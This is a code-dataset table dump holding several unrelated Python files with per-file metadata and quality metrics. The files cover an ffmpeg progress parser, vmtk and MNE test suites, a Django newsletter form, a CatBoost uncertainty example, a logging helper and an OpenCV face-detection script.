hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
fe224e1ffb01067a1145784abb7281fb2243b190
| 1,788
|
py
|
Python
|
smartfields/processors/video.py
|
suhaibroomy/django-smartfields
|
e9331dc74f72d0254608526f8816aa4bb8f1fca4
|
[
"MIT"
] | null | null | null |
smartfields/processors/video.py
|
suhaibroomy/django-smartfields
|
e9331dc74f72d0254608526f8816aa4bb8f1fca4
|
[
"MIT"
] | null | null | null |
smartfields/processors/video.py
|
suhaibroomy/django-smartfields
|
e9331dc74f72d0254608526f8816aa4bb8f1fca4
|
[
"MIT"
] | null | null | null |
import re
import six
from smartfields.processors.base import ExternalFileProcessor
from smartfields.utils import ProcessingError
__all__ = [
'FFMPEGProcessor'
]
class FFMPEGProcessor(ExternalFileProcessor):
duration_re = re.compile(r'Duration: (?P<hours>\d+):(?P<minutes>\d+):(?P<seconds>\d+)')
progress_re = re.compile(r'time=(?P<hours>\d+):(?P<minutes>\d+):(?P<seconds>\d+)')
error_re = re.compile(r'Invalid data found when processing input')
cmd_template = "ffmpeg -i {input} -y -codec:v {vcodec} -b:v {vbitrate} " \
"-maxrate {maxrate} -bufsize {bufsize} -vf " \
"scale={width}:{height} -threads {threads} -c:a {acodec} {output}"
def stdout_handler(self, line, duration=None):
if duration is None:
duration_time = self.duration_re.search(line)
if duration_time:
duration = self.timedict_to_seconds(duration_time.groupdict())
elif duration != 0:
current_time = self.progress_re.search(line)
if current_time:
seconds = self.timedict_to_seconds(current_time.groupdict())
progress = float(seconds)/duration
progress = progress if progress < 1 else 0.99
self.set_progress(progress)
elif self.error_re.search(line):
raise ProcessingError("Invalid video file or unknown video format.")
return (duration,)
def timedict_to_seconds(self, timedict):
seconds = 0
for key, t in six.iteritems(timedict):
if key == 'seconds':
seconds+= int(t)
elif key == 'minutes':
seconds+= int(t)*60
elif key == 'hours':
seconds+= int(t)*3600
return seconds
| 39.733333
| 91
| 0.599553
| 207
| 1,788
| 5.057971
| 0.415459
| 0.007641
| 0.031519
| 0.034384
| 0.047755
| 0.047755
| 0.047755
| 0.047755
| 0.047755
| 0
| 0
| 0.009302
| 0.278523
| 1,788
| 44
| 92
| 40.636364
| 0.802326
| 0
| 0
| 0
| 0
| 0.076923
| 0.217562
| 0.068792
| 0
| 0
| 0
| 0
| 0
| 1
| 0.051282
| false
| 0
| 0.102564
| 0
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe22b8aac4f7560fc1450a1ab43865faaf7aecdc
| 2,192
|
py
|
Python
|
tests/test_vmtkScripts/test_vmtksurfaceconnectivity.py
|
ramtingh/vmtk
|
4d6f58ce65d73628353ba2b110cbc29a2e7aa7b3
|
[
"Apache-2.0"
] | null | null | null |
tests/test_vmtkScripts/test_vmtksurfaceconnectivity.py
|
ramtingh/vmtk
|
4d6f58ce65d73628353ba2b110cbc29a2e7aa7b3
|
[
"Apache-2.0"
] | null | null | null |
tests/test_vmtkScripts/test_vmtksurfaceconnectivity.py
|
ramtingh/vmtk
|
4d6f58ce65d73628353ba2b110cbc29a2e7aa7b3
|
[
"Apache-2.0"
] | 1
|
2019-06-18T23:41:11.000Z
|
2019-06-18T23:41:11.000Z
|
## Program: VMTK
## Language: Python
## Date: January 12, 2018
## Version: 1.4
## Copyright (c) Richard Izzo, Luca Antiga, All rights reserved.
## See LICENSE file for details.
## This software is distributed WITHOUT ANY WARRANTY; without even
## the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR
## PURPOSE. See the above copyright notices for more information.
## Note: this code was contributed by
## Richard Izzo (Github @rlizzo)
## University at Buffalo
import pytest
import vmtk.vmtksurfaceconnectivity as connectivity
import os
@pytest.fixture(scope='module')
def aorta_surface_two_segments(input_datadir):
import vmtk.vmtksurfacereader as surfacereader
reader = surfacereader.vmtkSurfaceReader()
reader.InputFileName = os.path.join(input_datadir, 'aorta-surface-two-segments.vtp')
reader.Execute()
return reader.Surface
def test_extract_largest_surface(aorta_surface_two_segments, compare_surfaces):
name = __name__ + '_test_extract_largest_surface.vtp'
connectiv = connectivity.vmtkSurfaceConnectivity()
connectiv.Surface = aorta_surface_two_segments
connectiv.Method = 'largest'
connectiv.CleanOutput = 1
connectiv.Execute()
assert compare_surfaces(connectiv.Surface, name) == True
def test_extract_closest_to_reference_surface(aorta_surface_two_segments, aorta_surface_reference, compare_surfaces):
name = __name__ + '_test_extract_closest_to_reference_surface.vtp'
connectiv = connectivity.vmtkSurfaceConnectivity()
connectiv.Surface = aorta_surface_two_segments
connectiv.Method = 'closest'
connectiv.ReferenceSurface = aorta_surface_reference
connectiv.Execute()
assert compare_surfaces(connectiv.Surface, name) == True
def test_extract_closest_to_point(aorta_surface_two_segments, compare_surfaces):
name = __name__ + '_test_extract_closest_to_point.vtp'
connectiv = connectivity.vmtkSurfaceConnectivity()
connectiv.Surface = aorta_surface_two_segments
connectiv.Method = 'closest'
connectiv.ClosestPoint = [0.0, 0.0, 0.0]
connectiv.Execute()
assert compare_surfaces(connectiv.Surface, name) == True
| 35.354839
| 117
| 0.764599
| 253
| 2,192
| 6.339921
| 0.391304
| 0.074813
| 0.074813
| 0.114713
| 0.508105
| 0.479426
| 0.46384
| 0.46384
| 0.431421
| 0.393392
| 0
| 0.008108
| 0.156022
| 2,192
| 61
| 118
| 35.934426
| 0.858919
| 0.218978
| 0
| 0.411765
| 0
| 0
| 0.100771
| 0.084766
| 0
| 0
| 0
| 0
| 0.088235
| 1
| 0.117647
| false
| 0
| 0.117647
| 0
| 0.264706
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe23546882c9babc55f9bce0abdfba0776ff09c5
| 653
|
py
|
Python
|
sssoon/forms.py
|
Kingpin-Apps/django-sssoon
|
2a44d0d19e70dcd3127f9425c0ed4ba52355a1d2
|
[
"BSD-3-Clause"
] | 2
|
2018-04-20T08:28:10.000Z
|
2018-05-04T15:32:30.000Z
|
sssoon/forms.py
|
KINGH242/django-sssoon
|
2a44d0d19e70dcd3127f9425c0ed4ba52355a1d2
|
[
"BSD-3-Clause"
] | 2
|
2018-05-16T13:45:14.000Z
|
2020-07-29T22:01:37.000Z
|
sssoon/forms.py
|
Kingpin-Apps/django-sssoon
|
2a44d0d19e70dcd3127f9425c0ed4ba52355a1d2
|
[
"BSD-3-Clause"
] | null | null | null |
from django import forms
from nocaptcha_recaptcha.fields import NoReCaptchaField
class NewsletterForm(forms.Form):
email = forms.EmailField(label='Email', required=True,
widget=forms.TextInput(attrs={
'id': 'newsletter-email',
'type': 'email',
'title': 'Email',
'name': 'email',
'class': 'form-control transparent',
'placeholder': 'jane.doe@example.com'
}))
captcha = NoReCaptchaField()
| 40.8125
| 70
| 0.444104
| 45
| 653
| 6.422222
| 0.711111
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.456355
| 653
| 16
| 71
| 40.8125
| 0.814085
| 0
| 0
| 0
| 0
| 0
| 0.169725
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.153846
| 0
| 0.384615
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe242c827a7e391a419864c9504b7e2daf4968d1
| 1,054
|
py
|
Python
|
simple_run_menu.py
|
william01110111/simple_run_menu
|
804c6bb8d6c63c3a4d4c6d3377601bd44fb0eeea
|
[
"MIT"
] | null | null | null |
simple_run_menu.py
|
william01110111/simple_run_menu
|
804c6bb8d6c63c3a4d4c6d3377601bd44fb0eeea
|
[
"MIT"
] | null | null | null |
simple_run_menu.py
|
william01110111/simple_run_menu
|
804c6bb8d6c63c3a4d4c6d3377601bd44fb0eeea
|
[
"MIT"
] | null | null | null |
#! /bin/python3
# simple run menu
import os
import stat
def is_file_executable(path):
executable = stat.S_IEXEC | stat.S_IXGRP | stat.S_IXOTH
if not os.path.isfile(path):
return False
st = os.stat(path)
mode = st.st_mode
if not mode & executable:
return False
return True
def get_files_in_dir(directory):
if directory == '':
directory = '.'
if directory[-1] != '/':
directory += '/'
return [directory + i for i in os.listdir(directory)]
def command_to_name(command):
filename_with_ext = os.path.basename(command)
filename = filename_with_ext.rsplit('.', 1)[0]
name = filename.replace('_', ' ')
capitalized = ' '.join([i[0].upper() + i[1:] for i in name.split()])
return capitalized
class Option:
options = {}
@staticmethod
def add(command):
options['a'] = Option(command, command, 'a')
def __init__(self, name, command, trigger):
self.name = name
self.command = command
self.trigger = trigger
if __name__ == "__main__":
print([command_to_name(i) for i in get_files_in_dir('') if is_file_executable(i)])
| 22.425532
| 83
| 0.685009
| 154
| 1,054
| 4.461039
| 0.383117
| 0.021834
| 0.026201
| 0.037846
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.006849
| 0.16888
| 1,054
| 46
| 84
| 22.913043
| 0.777397
| 0.028463
| 0
| 0.058824
| 0
| 0
| 0.016634
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.147059
| false
| 0
| 0.058824
| 0
| 0.411765
| 0.029412
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe2476b1a28089e744d395040c690305385ddcb6
| 1,792
|
py
|
Python
|
mne/io/cnt/tests/test_cnt.py
|
stevemats/mne-python
|
47051833f21bb372d60afc3adbf4305648ac7f69
|
[
"BSD-3-Clause"
] | 1,953
|
2015-01-17T20:33:46.000Z
|
2022-03-30T04:36:34.000Z
|
mne/io/cnt/tests/test_cnt.py
|
LiFeng-SECUC/mne-python
|
732bb1f994e64e41a8e95dcc10dc98c22cac95c0
|
[
"BSD-3-Clause"
] | 8,490
|
2015-01-01T13:04:18.000Z
|
2022-03-31T23:02:08.000Z
|
mne/io/cnt/tests/test_cnt.py
|
LiFeng-SECUC/mne-python
|
732bb1f994e64e41a8e95dcc10dc98c22cac95c0
|
[
"BSD-3-Clause"
] | 1,130
|
2015-01-08T22:39:27.000Z
|
2022-03-30T21:44:26.000Z
|
# Author: Jaakko Leppakangas <jaeilepp@student.jyu.fi>
# Joan Massich <mailsik@gmail.com>
#
# License: BSD-3-Clause
import os.path as op
import numpy as np
from numpy.testing import assert_array_equal
import pytest
from mne import pick_types
from mne.datasets import testing
from mne.io.tests.test_raw import _test_raw_reader
from mne.io.cnt import read_raw_cnt
from mne.annotations import read_annotations
data_path = testing.data_path(download=False)
fname = op.join(data_path, 'CNT', 'scan41_short.cnt')
@testing.requires_testing_data
def test_data():
"""Test reading raw cnt files."""
with pytest.warns(RuntimeWarning, match='number of bytes'):
raw = _test_raw_reader(read_raw_cnt, input_fname=fname,
eog='auto', misc=['NA1', 'LEFT_EAR'])
# make sure we use annotations event if we synthesized stim
assert len(raw.annotations) == 6
eog_chs = pick_types(raw.info, eog=True, exclude=[])
assert len(eog_chs) == 2 # test eog='auto'
assert raw.info['bads'] == ['LEFT_EAR', 'VEOGR'] # test bads
# the data has "05/10/200 17:35:31" so it is set to None
assert raw.info['meas_date'] is None
@testing.requires_testing_data
def test_compare_events_and_annotations():
"""Test comparing annotations and events."""
with pytest.warns(RuntimeWarning, match='Could not parse meas date'):
raw = read_raw_cnt(fname)
events = np.array([[333, 0, 7],
[1010, 0, 7],
[1664, 0, 109],
[2324, 0, 7],
[2984, 0, 109]])
annot = read_annotations(fname)
assert len(annot) == 6
assert_array_equal(annot.onset[:-1], events[:, 0] / raw.info['sfreq'])
assert 'STI 014' not in raw.info['ch_names']
| 32
| 74
| 0.65346
| 259
| 1,792
| 4.362934
| 0.474903
| 0.030973
| 0.026549
| 0.046018
| 0.118584
| 0.058407
| 0
| 0
| 0
| 0
| 0
| 0.041817
| 0.226004
| 1,792
| 55
| 75
| 32.581818
| 0.772891
| 0.179688
| 0
| 0.058824
| 0
| 0
| 0.082702
| 0
| 0
| 0
| 0
| 0
| 0.235294
| 1
| 0.058824
| false
| 0
| 0.264706
| 0
| 0.323529
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe24a27fb5e1b1af1324c59e811661bad02c4101
| 792
|
py
|
Python
|
parliament_proposal_fetcher.py
|
Track-your-parliament/track-your-parliament-data
|
1ab9d9fe5cf4921e4cc792d0e3db3263557daafd
|
[
"MIT"
] | null | null | null |
parliament_proposal_fetcher.py
|
Track-your-parliament/track-your-parliament-data
|
1ab9d9fe5cf4921e4cc792d0e3db3263557daafd
|
[
"MIT"
] | null | null | null |
parliament_proposal_fetcher.py
|
Track-your-parliament/track-your-parliament-data
|
1ab9d9fe5cf4921e4cc792d0e3db3263557daafd
|
[
"MIT"
] | null | null | null |
import urllib.request, json
import pandas as pd
baseUrl = 'https://avoindata.eduskunta.fi/api/v1/tables/VaskiData'
parameters = 'rows?columnName=Eduskuntatunnus&columnValue=LA%25&perPage=100'
page = 0
df = ''
while True:
print(f'Fetching page number {page}')
with urllib.request.urlopen(f'{baseUrl}/{parameters}&page={page}') as url:
data = json.loads(url.read().decode())
if page == 0:
columns = data['columnNames']
df = pd.DataFrame(columns=columns)
dataRows = data['rowData']
df = df.append(pd.DataFrame(dataRows, columns=data['columnNames']), ignore_index=True)
if data['hasMore'] == False:
break
page = page + 1
df.to_csv('./data/parliament_proposals_raw.csv', sep=';', encoding='utf-8')
| 29.333333
| 94
| 0.641414
| 100
| 792
| 5.04
| 0.63
| 0.051587
| 0.087302
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.015873
| 0.204545
| 792
| 27
| 95
| 29.333333
| 0.784127
| 0
| 0
| 0
| 0
| 0
| 0.319042
| 0.163934
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.105263
| 0
| 0.105263
| 0.052632
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe2717913fd1b6cb1c949e299c54e281bc41335e
| 2,899
|
py
|
Python
|
examples/Catboost_regression-scorer_usage.py
|
emaldonadocruz/UTuning
|
b32207bcbeb80e4c07e098bcbe4d5ce8b3fee778
|
[
"BSD-3-Clause"
] | null | null | null |
examples/Catboost_regression-scorer_usage.py
|
emaldonadocruz/UTuning
|
b32207bcbeb80e4c07e098bcbe4d5ce8b3fee778
|
[
"BSD-3-Clause"
] | null | null | null |
examples/Catboost_regression-scorer_usage.py
|
emaldonadocruz/UTuning
|
b32207bcbeb80e4c07e098bcbe4d5ce8b3fee778
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Mon Sep 20 16:15:37 2021
@author: em42363
"""
# In[1]: Import functions
'''
CatBoost is a high-performance open source library for gradient boosting
on decision trees
'''
from catboost import CatBoostRegressor
from sklearn.model_selection import train_test_split
import pandas as pd
import seaborn as sns
import numpy as np
import os
os.chdir(os.path.dirname(__file__))
import sys
sys.path.insert(0, r'C:\Users\eduar\OneDrive\PhD\UTuning')
sys.path.insert(0, r'C:\Users\em42363\OneDrive\PhD\UTuning')
from UTuning import scorer, plots
#df = pd.read_csv(r'C:\Users\eduar\OneDrive\PhD\UTuning\dataset\unconv_MV.csv')
df = pd.read_csv(r'C:\Users\em42363\OneDrive\PhD\UTuning\dataset\unconv_MV.csv')
import random
import matplotlib.pyplot as plt
# In[1]: Split train test
'''
Perform split train test
'''
y = df['Production'].values
X = df[['Por', 'LogPerm', 'Brittle', 'TOC']].values
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.33)
# In[6]: Regressor
'''
Define the regressor, fit the model and predict the estimates
'''
model = CatBoostRegressor(iterations=1000, learning_rate=0.2, loss_function='RMSEWithUncertainty',
verbose=False, random_seed=0)
model.fit(X_train, y_train)
estimates = model.predict(X_test)
# In[9]: Plot error line
'''
Use UTuning to plot error lines
'''
plots.error_line(estimates[:, 0], y_test, np.sqrt(estimates[:, 1]), Frac=1)
# %% Define the virtual ensemble
def virt_ensemble(X_train,y_train, num_samples=100, iters=1000, lr=0.1): # 100, .1
ens_preds = []
model = CatBoostRegressor(iterations=iters, learning_rate=lr, loss_function='RMSEWithUncertainty',
verbose=False, random_seed=1)
model.fit(X_train,y_train)
ens_preds = model.virtual_ensembles_predict(X_test, prediction_type='VirtEnsembles',
virtual_ensembles_count=num_samples,
thread_count=8)
return np.asarray(ens_preds)
# %%
n_quantiles = 11
perc = np.linspace(0.0, 1.00, n_quantiles)
Samples = 10
ens_preds=virt_ensemble(X_train,y_train, num_samples=Samples)
Pred_array = ens_preds[:,:,0]
Knowledge_u=np.sqrt(np.var(Pred_array,axis=1)) #Knowledge uncertainty
Data_u=np.sqrt(np.mean(ens_preds[:,:,1],axis=1)) #Data uncertainty
Sigma=Knowledge_u+Data_u
# %%
'''
We use UTuning to return the Indicator Function and plot the
accuracy plot and diagnose our model.
'''
scorer = scorer.scorer(Pred_array, y_test, Sigma)
IF_array = scorer.IndicatorFunction()
avgIF = np.mean(IF_array,axis=0)
# % Second plot test
plots.error_accuracy_plot(perc,IF_array,Pred_array,y_test,Sigma)
# %
print('Accuracy = {0:2.2f}'.format(scorer.Accuracy()))
print('Precision = {0:2.2f}'.format(scorer.Precision()))
print('Goodness = {0:2.2f}'.format(scorer.Goodness()))
| 26.354545
| 102
| 0.703001
| 434
| 2,899
| 4.534562
| 0.373272
| 0.02439
| 0.014228
| 0.02439
| 0.259146
| 0.215447
| 0.195122
| 0.034553
| 0
| 0
| 0
| 0.034994
| 0.162125
| 2,899
| 109
| 103
| 26.59633
| 0.775216
| 0.119007
| 0
| 0.043478
| 0
| 0
| 0.123344
| 0.059845
| 0
| 0
| 0
| 0
| 0
| 1
| 0.021739
| false
| 0
| 0.217391
| 0
| 0.26087
| 0.065217
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe27a69a39058bf33d488a199887b8c07ffdf22c
| 1,683
|
py
|
Python
|
sujson/_logger.py
|
PotasnikM/translator-to-suJSON
|
abb2001c78d431bd2087754666bc896ba0543dfd
|
[
"MIT"
] | 2
|
2019-07-01T12:45:25.000Z
|
2020-06-23T11:48:08.000Z
|
sujson/_logger.py
|
PotasnikM/translator-to-suJSON
|
abb2001c78d431bd2087754666bc896ba0543dfd
|
[
"MIT"
] | 17
|
2019-04-25T10:46:40.000Z
|
2020-11-10T09:28:55.000Z
|
sujson/_logger.py
|
PotasnikM/translator-to-suJSON
|
abb2001c78d431bd2087754666bc896ba0543dfd
|
[
"MIT"
] | 3
|
2019-06-22T19:51:08.000Z
|
2021-02-08T09:17:55.000Z
|
import logging
from platform import system
from tqdm import tqdm
from multiprocessing import Lock
loggers = {}
# https://stackoverflow.com/questions/38543506/
class TqdmLoggingHandler(logging.Handler):
def __init__(self, level=logging.NOTSET):
super(TqdmLoggingHandler, self).__init__(level)
def emit(self, record):
try:
msg = self.format(record)
tqdm.set_lock(Lock())
tqdm.write(msg)
self.flush()
except (KeyboardInterrupt, SystemExit):
raise
except:
self.handleError(record)
def setup_custom_logger(name):
"""
Create a logger with a certain name and level
"""
global loggers
if loggers.get(name):
return loggers.get(name)
formatter = logging.Formatter(
fmt='%(levelname)s: %(message)s'
)
handler = TqdmLoggingHandler()
handler.setFormatter(formatter)
if system() not in ['Windows', 'cli']:
logging.addLevelName(logging.ERROR, "\033[1;31m%s\033[1;0m" % logging.getLevelName(logging.ERROR))
logging.addLevelName(logging.WARNING, "\033[1;33m%s\033[1;0m" % logging.getLevelName(logging.WARNING))
logging.addLevelName(logging.INFO, "\033[1;34m%s\033[1;0m" % logging.getLevelName(logging.INFO))
logging.addLevelName(logging.DEBUG, "\033[1;35m%s\033[1;0m" % logging.getLevelName(logging.DEBUG))
logger = logging.getLogger(name)
logger.setLevel(logging.WARNING)
# if (logger.hasHandlers()):
# logger.handlers.clear()
if logger.handlers:
logger.handlers = []
logger.addHandler(handler)
loggers.update(dict(name=logger))
return logger
| 29.017241
| 110
| 0.655971
| 193
| 1,683
| 5.663212
| 0.414508
| 0.029277
| 0.095151
| 0.025618
| 0.120769
| 0.120769
| 0.120769
| 0
| 0
| 0
| 0
| 0.039514
| 0.218063
| 1,683
| 57
| 111
| 29.526316
| 0.791033
| 0.087344
| 0
| 0
| 0
| 0
| 0.079051
| 0.055336
| 0
| 0
| 0
| 0
| 0
| 1
| 0.076923
| false
| 0
| 0.102564
| 0
| 0.25641
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe27abc65b6073ec58be633f81761077a129a312
| 1,243
|
py
|
Python
|
face-detect.py
|
Gicehajunior/face-recognition-detection-OpenCv-Python
|
6551285ce5b4532d8b6f3ad6b8e9a29564673ea9
|
[
"Unlicense"
] | null | null | null |
face-detect.py
|
Gicehajunior/face-recognition-detection-OpenCv-Python
|
6551285ce5b4532d8b6f3ad6b8e9a29564673ea9
|
[
"Unlicense"
] | null | null | null |
face-detect.py
|
Gicehajunior/face-recognition-detection-OpenCv-Python
|
6551285ce5b4532d8b6f3ad6b8e9a29564673ea9
|
[
"Unlicense"
] | null | null | null |
import cv2
import sys
import playsound
face_cascade = cv2.CascadeClassifier('cascades/haarcascade_frontalface_default.xml')
# capture video using cv2
video_capture = cv2.VideoCapture(0)
while True:
# capture frame by frame, i.e, one by one
ret, frame = video_capture.read()
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
# for each face on the projected on the frame
faces = face_cascade.detectMultiScale(
gray,
scaleFactor = 1.1,
minNeighbors = 5,
# minSize(35, 35)
)
# loop through the video faces for detection
for (x, y, w, h) in faces:
point1 = x+w
point2 = y+h
frame_color = (50, 50, 200)
rectangleBox = cv2.rectangle(frame, (x, y), (point1, point2), frame_color, 2)
cv2.imshow('video', frame)
if faces.any():
playsound.playsound('openDoorAlert.mp3', True)
if len(faces) > 1:
print("There are " + str(len(faces)) + " peoples at the gate")
else:
print("There is " + str(len(faces)) + " person at the gate")
else:
pass
if cv2.waitKey(1) & 0xFF == ord('q'):
sys.exit()
| 28.25
| 85
| 0.563154
| 153
| 1,243
| 4.51634
| 0.522876
| 0.034732
| 0.031838
| 0.037627
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.040719
| 0.328238
| 1,243
| 43
| 86
| 28.906977
| 0.786826
| 0.134352
| 0
| 0.068966
| 0
| 0
| 0.116822
| 0.041122
| 0
| 0
| 0.003738
| 0
| 0
| 1
| 0
| false
| 0.034483
| 0.103448
| 0
| 0.103448
| 0.068966
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
